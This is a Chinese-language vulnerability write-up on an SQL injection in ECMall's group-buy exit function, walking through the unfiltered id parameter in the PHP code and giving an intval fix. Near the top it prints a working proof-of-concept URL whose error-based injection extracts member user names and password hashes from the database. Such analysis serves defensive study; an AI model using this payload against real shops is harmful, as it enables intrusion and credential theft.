catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

Relevant Link:

2. 漏洞触发条件

0x1: POC

http://localhost/ecmall/index.php?app=buyer_groupbuy&act=exit_group&id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b

3. 漏洞影响范围
4. 漏洞代码分析

/app/buyer_groupbuy.app.php

function exit_group()

{

    //未对$id进行规范化过滤,导致攻击者可以传入非int型数据

    $id = empty($_GET['id']) ?  : $_GET['id'];

    if (!$id)

    {

        $this->show_warning('no_such_groupbuy');

        return false;

    }

    // 判断是否能退团

    if (!$this->_ican($id, ACT))

    {

        $this->show_warning('Hacking Attempt');

        return;

    }

    $member_mod = &m('member');

    $member_mod->unlinkRelation('join_groupbuy', $this->visitor->info['user_id'], $id);

    $this->show_message('exit_groupbuy_succeed');

}

跟进if (!$this->_ican($id, ACT))

function _ican($id, $act = '')

{

    $state_permission = array(

        GROUP_PENDING   => array(),

        GROUP_ON        => array('view', 'exit_group'),

        GROUP_END       => array('view'),

        GROUP_FINISHED  => array('view', 'buy'),

        GROUP_CANCELED  => array('view')

    );

    $group = current($this->_member_mod->getRelatedData('join_groupbuy', $this->visitor->info['user_id'], array(

        'conditions' => 'gb.group_id=' . $id,   //传入未过滤的$id参数

        'order' => 'gb.group_id DESC',

        'fields' => 'gb.state,groupbuy_log.order_id'

    )));

    if (!$group)

    {

        return false; // 越权或没有该团购

    }

    else

    {

        $state_permission[GROUP_FINISHED] = $group['order_id'] >  ? array('view', 'view_order') : array('view', 'buy');

    }

    if (empty($act))

    {

        return $state_permission[$group['state']]; // 返回该团购此状态时允许的操作

    }

    return in_array($act, $state_permission[$group['state']]) ? true : false; // 该团购此状态是否允许执行此操作

}

继续跟进$this->_member_mod->getRelatedData
/eccore/model/mode.base.php

function getRelatedData($relation_name, $ids, $find_param = array())

{

    $relation_info = $this->getRelation($relation_name);

    $model =& m($relation_info['model']);

    if (empty($ids))

    {

        $this->_error('no_ids_to_assoc', $model->getName());

        return false;

    }

    if ($relation_info['type'] != HAS_MANY && $relation_info['type'] != HAS_AND_BELONGS_TO_MANY)

    {

        $this->_error('invalid_assoc_model', $model->getName());

        return false;

    }

    $alias = $model->alias;

    /* 如果是多对多关系,则连接的表的别名为指定别名或中间表名,否则为模型的别名 */

    if ($relation_info['type'] == HAS_AND_BELONGS_TO_MANY)

    {

        $be_related = $model->getRelation($relation_info['reverse']);

        $alias = isset($be_related['alias']) ? $be_related['alias'] : $be_related['middle_table'];

    }

    /* 构造查询条件 */

    $conditions = $alias . '.' . $relation_info['foreign_key'] . ' ' . db_create_in($ids);   //主键值限定

    $conditions .= $relation_info['ext_limit'] ?

                ' AND ' . $this->_getExtLimit($relation_info['ext_limit'], $alias)

                : '';

    $conditions .= is_string($find_param['conditions']) ? ' AND ' . $find_param['conditions'] : '';

    $find_param['conditions'] = $conditions;

    /* 查询字段 */

    $find_param['fields'] = !empty($find_param['fields']) ?

                    $find_param['fields'] . ',' . $alias . '.' .$relation_info['foreign_key']

                    : '';

    switch ($relation_info['type'])

    {

        case HAS_MANY:

        break;

        case HAS_AND_BELONGS_TO_MANY:

        $find_param['join']   = !empty($find_param['join'])   ?

                        $find_param['join'] . ',' . $relation_info['reverse']

                        : $relation_info['reverse'];

        empty($find_param['order']) && $find_param['order'] = $model->alias . ".{$model->prikey} DESC";

        $find_param['index_key'] = array($relation_info['foreign_key'], $model->prikey);

        break;

    }

    return $model->find($find_param);

}

5. 防御方法

/app/buyer_groupbuy.app.php

function exit_group()

{

    //通过intval进行规范化过滤

    //$id = empty($_GET['id']) ? 0 : $_GET['id'];

    $id = empty($_GET['id']) ?  : intval( $_GET['id'] );

    if (!$id)

    {

        $this->show_warning('no_such_groupbuy');

        return false;

    }

    // 判断是否能退团

    if (!$this->_ican($id, ACT))

    {

        $this->show_warning('Hacking Attempt');

        return;

    }

    $member_mod = &m('member');

    $member_mod->unlinkRelation('join_groupbuy', $this->visitor->info['user_id'], $id);

    $this->show_message('exit_groupbuy_succeed');

}

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

ECMall /app/buyer_groupbuy.app.php SQL Injection Vul的更多相关文章

  1. ecshop /search.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞 ...

  2. ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过滤处理,导出 ...

  3. discuz /faq.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 . 通过获取管理员密码 . 对管理员密码进行破解.通过在cmd5.com ...

  4. ecshop /goods.php SQL Injection Vul

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述2. 漏洞触发条件 0x1: poc http://localhost ...

  5. ecshop /category.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://sebug.net/vuld ...

  6. ecshop /api/client/api.php、/api/client/includes/lib_api.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECShop存在一个盲注漏洞,问题存在于/api/client/api. ...

  7. ecshop /flow.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏 ...

  8. ecshop /includes/modules/payment/alipay.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP支付插件存在SQL注入漏洞,此漏洞存在于/includes/ ...

  9. dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 注射漏洞成功需要条件如下 . php magic_quotes_gpc= ...

随机推荐

  1. codevs1910 递归函数

    难度等级:黄金 codevs1910 递归函数 题目描述 Description 对于一个递归函数w(a, b, c). 如果a <= 0 or b <= 0 or c <= 0就返 ...

  2. c++基础 explicit

    c++的构造函数也定义了一个隐式转换 explicit只对构造函数起作用,用来抑制隐式转换 看一个小例子 新建一个头文件 #ifndef CMYSTRING_H #define CMYSTRING_H ...

  3. lecture9-提高模型泛化能力的方法

    HInton第9课,这节课没有放论文进去.....如有不对之处还望指正.话说hinton的课果然信息量够大.推荐认真看PRML<Pattern Recognition and Machine L ...

  4. Windjs应用

    一个异步的js类库,应用价值不大,所以代码也没在维护了.在做h5特效或者游戏动画方面有点用处. $await是Windjs的核心api.具体可以check 浅谈Jscex的$await语义及异步任务模 ...

  5. STM32-外部中断,没有硬件干扰就是快乐

    一:触发方式 STM32 的外部中断是通过边沿来触发的,不支持电平触发: 二:外部中断分组 STM32 的每一个GPIO都能配置成一个外部中断触发源,STM32 通过根据引脚的序号不同将众多中断触发源 ...

  6. 为什么VC经常输出烫烫烫烫烫烫烫烫

    为什么VC经常输出烫烫烫烫烫烫烫烫 2012-05-07 11:52 by Rollen Holt, 12747 阅读, 4 评论, 收藏, 编辑 在Debug 模式下, VC 会把未初始化的栈内存全 ...

  7. Recommending branded products from social media -RecSys 2013-20160422

    1.Information publication:RecSys 2013 author:zhengyong zhang 2.What 是对上一篇论文的拓展:利用社交媒体中用户信息 对用户购买的类别排 ...

  8. Android回调

    当A页面跳往B页面做一些操作后,再从B页面回到A页面时,A页面想要回去一些B页面操作的数据时,我们一般会使用回调. 1 public class MainActivity extends Activi ...

  9. Mysql 慢查询和慢查询日志分析

    众所周知,大访问量的情况下,可添加节点或改变架构可有效的缓解数据库压力,不过一切的原点,都是从单台mysql开始的.下面总结一些使用过或者研究过的经验,从配置以及调节索引的方面入手,对mysql进行一 ...

  10. Struts2.3.4.1+Spring3.2.3+Hibernate4.1.9整合

    java教程|Struts2.3.4.1+Spring3.2.3+Hibernate4.1.9整合教程并测试成功一.创建项目二.搭建struts-2.3.4.11.struts2必须的Jar包(放到W ...